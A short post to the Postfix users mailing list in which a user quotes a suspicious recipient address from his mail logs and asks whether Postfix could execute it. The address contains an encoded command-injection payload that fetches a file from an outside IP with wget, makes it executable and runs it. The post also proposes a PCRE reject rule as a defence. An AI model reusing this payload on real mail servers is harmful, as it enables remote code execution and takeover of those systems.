Hey
i found this crazy recipient-address in my postfix-logs:
root+${run{x2Fbinx2Fsht-ctx22wgetx20103.11.228.92x2fssx20-Osxsx3bchmodx20x2bxx20sxsx3b.x2fsxsx22}}@localhost
seems that someone tries to to downlaod something with wget, then chmod 'x'
and finally execute the downloded crap
Is there any chance, that postfix excutes such cracy stuff - maybe in PCRE
oder RegEx or somehere else ?
is there any not expected side effect when i add /\$\{/ REJECT in a
check_recipient_access pcre-file ?
thanks in advance
Kris
--
Sent from: http://postfix.1071664.n5.nabble.com/Postfix-Users-f2.html
